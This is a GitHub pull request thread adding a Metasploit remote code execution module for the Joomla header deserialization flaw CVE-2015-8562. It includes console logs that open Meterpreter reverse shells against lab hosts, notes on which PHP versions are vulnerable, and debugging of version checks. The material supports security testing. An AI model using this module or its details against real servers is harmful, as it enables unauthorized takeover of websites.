New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add 2015-8562 - Joomla RCE module #6355

Merged
merged 19 commits into from Dec 16, 2015

Conversation

Projects
None yet
@FireFart
Contributor

FireFart commented Dec 15, 2015

This exploit only works on PHP versions before 5.4.45 (including 5.3.x), 5.5.29 and 5.6.13.

Vulnerable Version:
https://github.com/joomla/joomla-cms/releases/tag/3.4.5

msf exploit(joomla_user_agent_rce) > show options

Module options (exploit/multi/http/joomla_user_agent_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HEADER     USER-AGENT       yes       The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.211.55.23     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /joomla/         yes       The path to joomla
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Joomla


msf exploit(joomla_user_agent_rce) > run

[*] Started reverse handler on 10.211.55.2:4444
[*] Sending payload ...
[*] Sending stage (33068 bytes) to 10.211.55.23
[*] Meterpreter session 1 opened (10.211.55.2:4444 -> 10.211.55.23:60834) at 2015-12-15 17:22:22 +0100

^C[-] Exploit failed: Interrupt

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:51:20 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >
@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 15, 2015

Contributor

@FireFart The exploit doesn't work for me, so I imagine your exploit is meant to work against a specific setup? If so, I encourage you to write a check, also mention exactly what setup(s) should work in the module description. Thanks.

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart The exploit doesn't work for me, so I imagine your exploit is meant to work against a specific setup? If so, I encourage you to write a check, also mention exactly what setup(s) should work in the module description. Thanks.

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@wchen-r7 for me it only worked on a Ubuntu 12.04 install with PHP 5.3. Ubuntu 14.04 is currently not working (see first comment). I still need to investigate what changed between 12.04 and 14.04 that causes the module to not function.

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 for me it only worked on a Ubuntu 12.04 install with PHP 5.3. Ubuntu 14.04 is currently not working (see first comment). I still need to investigate what changed between 12.04 and 14.04 that causes the module to not function.

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 15, 2015

Contributor

@FireFart Thanks for the clarification. Would you like us to put this on hold (a Delayed label) so you and @wvu-r7 can continue working on it?

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart Thanks for the clarification. Would you like us to put this on hold (a Delayed label) so you and @wvu-r7 can continue working on it?

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@wchen-r7 As you like. Either we update the description with the details and investigate later so the module is in master, or we do the checks first.

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 As you like. Either we update the description with the details and investigate later so the module is in master, or we do the checks first.

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@wchen-r7 BTW: https://twitter.com/MarcS0h/status/676801098603216896 so maybe it's only working in PHP 5.3

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 BTW: https://twitter.com/MarcS0h/status/676801098603216896 so maybe it's only working in PHP 5.3

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

Will be waiting for any changes it also dsnt work for me
[] Started reverse handler on 192.168.1.108:4444
[
] Sending payload ...
and nth more and TU for the module :)

madmike33 commented Dec 15, 2015

Will be waiting for any changes it also dsnt work for me
[] Started reverse handler on 192.168.1.108:4444
[
] Sending payload ...
and nth more and TU for the module :)

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 15, 2015

Contributor

@FireFart Thanks. I will send you the check.

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart Thanks. I will send you the check.

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 15, 2015

Contributor

@FireFart here you go (the check): FireFart#7

I didn't add more info in the description, I figured you know better than I do at this point :-)

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart here you go (the check): FireFart#7

I didn't add more info in the description, I figured you know better than I do at this point :-)

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

This is the "hidden" error message on Ubuntu 14.04:
Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO gutma_session (session_id, client_id, time) VALUES ('', 0, '1450199122')

So the first requests inserts a NULL session in the database

Contributor

FireFart commented Dec 15, 2015

This is the "hidden" error message on Ubuntu 14.04:
Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO gutma_session (session_id, client_id, time) VALUES ('', 0, '1450199122')

So the first requests inserts a NULL session in the database

@madmike33

This comment has been minimized.

Show comment
Hide comment
@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

thx @wchen-r7 but there is a bug in the check code:

[*] 10.211.55.23:80 - Found PHP version: 5.3.10
[-] 10.211.55.23:80 - This module currently does not work against this PHP version
Contributor

FireFart commented Dec 15, 2015

thx @wchen-r7 but there is a bug in the check code:

[*] 10.211.55.23:80 - Found PHP version: 5.3.10
[-] 10.211.55.23:80 - This module currently does not work against this PHP version
@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@wchen-r7 I fixed the version check

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 I fixed the version check

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 15, 2015

Contributor

@FireFart Ah, thanks!

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart Ah, thanks!

@lucyoa

This comment has been minimized.

Show comment
Hide comment
@lucyoa

lucyoa Dec 15, 2015

Contributor

This might help: https://bugs.php.net/bug.php?id=70219
"i think that if the previous deserialized session data is invalid, should not continue to follow deserialized because it may produce unexpected session data. so i update a new patch for this bug."

Thats why it does not work on latest php. Corrupted session data stops deserialization (in joomla case it is size of the string in previous array).

Contributor

lucyoa commented Dec 15, 2015

This might help: https://bugs.php.net/bug.php?id=70219
"i think that if the previous deserialized session data is invalid, should not continue to follow deserialized because it may produce unexpected session data. so i update a new patch for this bug."

Thats why it does not work on latest php. Corrupted session data stops deserialization (in joomla case it is size of the string in previous array).

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@lucyoa thanks for finding this bug report!

Contributor

FireFart commented Dec 15, 2015

@lucyoa thanks for finding this bug report!

@bgeesaman

This comment has been minimized.

Show comment
Hide comment
@bgeesaman

bgeesaman Dec 15, 2015

Can anyone with a working target provide a "show create table #prefix_session;" from within their mysql db? Wondering if the default encoding of latin1 is correct. I've got a 12.04 running php 5.3.10-1ubuntu3.8 that just won't work no matter what I try. Thinking my setup differs somehow.

Here's mine. Thanks!

CREATE TABLE `pref_session` (
  `session_id` varchar(200) NOT NULL DEFAULT '',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `guest` tinyint(4) unsigned DEFAULT '1',
  `time` varchar(14) DEFAULT '',
  `data` mediumtext,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1```

bgeesaman commented Dec 15, 2015

Can anyone with a working target provide a "show create table #prefix_session;" from within their mysql db? Wondering if the default encoding of latin1 is correct. I've got a 12.04 running php 5.3.10-1ubuntu3.8 that just won't work no matter what I try. Thinking my setup differs somehow.

Here's mine. Thanks!

CREATE TABLE `pref_session` (
  `session_id` varchar(200) NOT NULL DEFAULT '',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `guest` tinyint(4) unsigned DEFAULT '1',
  `time` varchar(14) DEFAULT '',
  `data` mediumtext,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1```
@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@bgeesaman:

mysql> show create table ebqur_session;
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Table         | Create Table                                                                                                                                                                                                                                                                                                                                                                                                                       |
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ebqur_session | CREATE TABLE `ebqur_session` (
  `session_id` varchar(200) NOT NULL DEFAULT '',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `guest` tinyint(4) unsigned DEFAULT '1',
  `time` varchar(14) DEFAULT '',
  `data` mediumtext,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 |
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>
Contributor

FireFart commented Dec 15, 2015

@bgeesaman:

mysql> show create table ebqur_session;
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Table         | Create Table                                                                                                                                                                                                                                                                                                                                                                                                                       |
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ebqur_session | CREATE TABLE `ebqur_session` (
  `session_id` varchar(200) NOT NULL DEFAULT '',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `guest` tinyint(4) unsigned DEFAULT '1',
  `time` varchar(14) DEFAULT '',
  `data` mediumtext,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 |
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>
@bgeesaman

This comment has been minimized.

Show comment
Hide comment
@bgeesaman

bgeesaman Dec 15, 2015

@FireFart Thanks for helping with that. It looks like the latin1 vs utf8 charset has no effect. Things look identical in the sessions table before/after.

bgeesaman commented Dec 15, 2015

@FireFart Thanks for helping with that. It looks like the latin1 vs utf8 charset has no effect. Things look identical in the sessions table before/after.

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@bgeesaman maybe this helps. For further questions please refer to IRC to keep this pull request small and simple

mysql> show variables like 'char%';
+--------------------------+----------------------------+
| Variable_name            | Value                      |
+--------------------------+----------------------------+
| character_set_client     | latin1                     |
| character_set_connection | latin1                     |
| character_set_database   | latin1                     |
| character_set_filesystem | binary                     |
| character_set_results    | latin1                     |
| character_set_server     | latin1                     |
| character_set_system     | utf8                       |
| character_sets_dir       | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
8 rows in set (0.00 sec)
Contributor

FireFart commented Dec 15, 2015

@bgeesaman maybe this helps. For further questions please refer to IRC to keep this pull request small and simple

mysql> show variables like 'char%';
+--------------------------+----------------------------+
| Variable_name            | Value                      |
+--------------------------+----------------------------+
| character_set_client     | latin1                     |
| character_set_connection | latin1                     |
| character_set_database   | latin1                     |
| character_set_filesystem | binary                     |
| character_set_results    | latin1                     |
| character_set_server     | latin1                     |
| character_set_system     | utf8                       |
| character_sets_dir       | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
8 rows in set (0.00 sec)
@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@wchen-r7 if the php bug @lucyoa linked to is correct, versions

<= 5.4.44 (http://www.php.net/ChangeLog-5.php#5.4.45)
<= 5.5.28 (http://www.php.net/ChangeLog-5.php#5.5.29)
<= 5.6.12 (http://www.php.net/ChangeLog-5.php#5.6.13)

should be vulnerable too.

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 if the php bug @lucyoa linked to is correct, versions

<= 5.4.44 (http://www.php.net/ChangeLog-5.php#5.4.45)
<= 5.5.28 (http://www.php.net/ChangeLog-5.php#5.5.29)
<= 5.6.12 (http://www.php.net/ChangeLog-5.php#5.6.13)

should be vulnerable too.

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

I updated the check method to include vulnerable PHP versions

Contributor

FireFart commented Dec 15, 2015

I updated the check method to include vulnerable PHP versions

FireFart added some commits Dec 16, 2015

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 16, 2015

Contributor

Debians PHP version is now also checked

Contributor

FireFart commented Dec 16, 2015

Debians PHP version is now also checked

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 16, 2015

Contributor

@wvu-r7 @wchen-r7 I think the module is now ready for merging. I implemented all possible checks i could find so the module will only be executed on valid targets.

Contributor

FireFart commented Dec 16, 2015

@wvu-r7 @wchen-r7 I think the module is now ready for merging. I implemented all possible checks i could find so the module will only be executed on valid targets.

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 16, 2015

Contributor

@FireFart That's good, thanks. @wvu-r7 will handle it.

Contributor

wchen-r7 commented Dec 16, 2015

@FireFart That's good, thanks. @wvu-r7 will handle it.

return Exploit::CheckCode::Safe
end
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })

This comment has been minimized.

@wchen-r7

wchen-r7 Dec 16, 2015

Contributor

Just curious, does every Joomla come with joomla.xml? Because we could have done this with https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/joomla_version.rb?

@wchen-r7

wchen-r7 Dec 16, 2015

Contributor

Just curious, does every Joomla come with joomla.xml? Because we could have done this with https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/joomla_version.rb?

This comment has been minimized.

@anantshri

anantshri Dec 16, 2015

Contributor

I suppose yes this is one of the default file's that comes with joomla. similar to readme.html of wordpress. However multiple way to validate version is always a good idea coz being one of the default file a lot of places this might be blocked by the serveradmin's.

@anantshri

anantshri Dec 16, 2015

Contributor

I suppose yes this is one of the default file's that comes with joomla. similar to readme.html of wordpress. However multiple way to validate version is always a good idea coz being one of the default file a lot of places this might be blocked by the serveradmin's.

This comment has been minimized.

@FireFart

FireFart Dec 16, 2015

Contributor

@wchen-r7 by looking at the changes joomla/joomla-cms@3.4.5...3.4.6 the version is only updated in joomla.xml so this might be the only reliable way to check the version. There might be some api calls which return the version based on the XML but that would require more investigation. Looks like the joomla_version scanner could also check this file

@FireFart

FireFart Dec 16, 2015

Contributor

@wchen-r7 by looking at the changes joomla/joomla-cms@3.4.5...3.4.6 the version is only updated in joomla.xml so this might be the only reliable way to check the version. There might be some api calls which return the version based on the XML but that would require more investigation. Looks like the joomla_version scanner could also check this file

This comment has been minimized.

@wchen-r7

wchen-r7 Dec 16, 2015

Contributor

ok cool, thanks.

@wchen-r7

wchen-r7 Dec 16, 2015

Contributor

ok cool, thanks.

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Dec 16, 2015

Contributor

Lol, I'm going to gift this to @wchen-r7.

Contributor

wvu-r7 commented Dec 16, 2015

Lol, I'm going to gift this to @wchen-r7.

@wvu-r7 wvu-r7 assigned wchen-r7 and unassigned wvu-r7 Dec 16, 2015

@puntoCL

This comment has been minimized.

Show comment
Hide comment
@puntoCL

puntoCL Dec 16, 2015

[] Started reverse handler on 192.168.0.5:4444
[
] xxx.xxx.xxx.xxx:80 - Sending payload ...
[*] Exploit completed, but no session was created.

puntoCL commented Dec 16, 2015

[] Started reverse handler on 192.168.0.5:4444
[
] xxx.xxx.xxx.xxx:80 - Sending payload ...
[*] Exploit completed, but no session was created.

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 16, 2015

Contributor

now the 4byte UTF8 character is also randomized (thanks to @wvu-r7 for his prettier version than mine :D ). Maybe we should move this method to Rex::Text:: later on.

Contributor

FireFart commented Dec 16, 2015

now the 4byte UTF8 character is also randomized (thanks to @wvu-r7 for his prettier version than mine :D ). Maybe we should move this method to Rex::Text:: later on.

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 16, 2015

Contributor

@FireFart The exploit works for me, so I will merge it:

msf exploit(joomla_http_header_rce) > check
[*] 192.168.1.205:80 - The target appears to be vulnerable.
msf exploit(joomla_http_header_rce) > run

[*] Started reverse handler on 192.168.1.199:4444 
[*] 192.168.1.205:80 - Sending payload ...
[*] Sending stage (33068 bytes) to 192.168.1.205
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.205:53576) at 2015-12-16 17:53:45 -0600

meterpreter >
Contributor

wchen-r7 commented Dec 16, 2015

@FireFart The exploit works for me, so I will merge it:

msf exploit(joomla_http_header_rce) > check
[*] 192.168.1.205:80 - The target appears to be vulnerable.
msf exploit(joomla_http_header_rce) > run

[*] Started reverse handler on 192.168.1.199:4444 
[*] 192.168.1.205:80 - Sending payload ...
[*] Sending stage (33068 bytes) to 192.168.1.205
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.205:53576) at 2015-12-16 17:53:45 -0600

meterpreter >

@wchen-r7 wchen-r7 merged commit 8c43ecb into rapid7:master Dec 16, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Dec 16, 2015

@wchen-r7 wchen-r7 changed the title from add joomla RCE module to Add 2015-8562 - Joomla RCE module Dec 17, 2015

@FireFart FireFart deleted the FireFart:joomla branch Dec 17, 2015

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 17, 2015

Contributor

thanks @wvu-r7 and @wchen-r7 !

Contributor

FireFart commented Dec 17, 2015

thanks @wvu-r7 and @wchen-r7 !

@tranminhthien95

This comment has been minimized.

Show comment
Hide comment
@tranminhthien95

tranminhthien95 Apr 13, 2017

test

I have failed to create a session. help me

tranminhthien95 commented Apr 13, 2017

test

I have failed to create a session. help me

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Apr 14, 2017

Contributor

If you believe there is a bug in the module, please add an issue instead of commenting on the PR. If you simply need help, ask in the IRC chat room #metasploit. Finally, for best results include more information such as joomla version, host OS version, etc.

Contributor

h00die commented Apr 14, 2017

If you believe there is a bug in the module, please add an issue instead of commenting on the PR. If you simply need help, ask in the IRC chat room #metasploit. Finally, for best results include more information such as joomla version, host OS version, etc.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment